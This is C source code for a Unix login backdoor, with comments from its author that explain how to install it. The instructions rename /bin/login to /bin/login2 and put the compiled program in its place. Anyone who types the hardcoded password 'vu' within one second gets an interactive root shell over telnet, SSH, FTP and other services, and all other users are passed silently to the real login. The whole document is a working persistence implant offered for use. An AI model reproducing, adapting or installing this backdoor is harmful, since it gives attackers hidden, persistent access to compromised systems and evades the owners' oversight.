This is a login backdoor for Unix systems. The password has to be hardcoded and the old login binary has to be renamed to /bin/login2.
217f00bb27d60a35186b99f146f77350a9a18fab4a2cdf7871aac5d862bed1f6
/*
* [ vulcan ]
* vulcan@galactica.it
* tnx to ElectronicSoulS
*
* very simple UNIX Deamon Backdoor
* It work with FTP, TELNET, SSH, HTTPD, POP and more deamons
* Explain :
* copy the original (ex /bin/login to /bin/login2)
* then compile this file and just copy to the original
* Ex : cp /bin/login /bin/login2 ---> define the ORIGINAL /bin/login2
* gcc vulback.c -o vulcback, cp -rf vulcback /bin/login ---> define BACKDOOR
* after this telnet HOST PORT (Ex 23) and digit the PASS (Ex vu) in max 2 second
* fuck the world!
*
*/
#include<signal.h>
#include<stdio.h>
#include<string.h>
#include<unistd.h>
#define ORIGINAL "/bin/login2" /*original */
#define BACKDOOR "/bin/login" /* here compiled file */
#define PASS "vu" /* one second to digit it, enjoy ;P */
char **execute;
char passwd[5];
int main(int argc, char *argv[]) {
void connection();
signal(SIGALRM,connection);
alarm(1);
execute=argv;
*execute=BACKDOOR;
scanf("%s",passwd);
if(strcmp(passwd,PASS)==0) {
alarm(0);
printf("[ *** Warriors 2001 *** ] \n");
execl("/bin/sh","/bin/sh","-i",0);
execl("unset", "HISTFILE",0);
execv("id",execute);
exit(0);
}
else
{
execv(ORIGINAL,execute);
exit(0);
}
}
void connection()
{
execv(ORIGINAL,execute);
exit(0);
}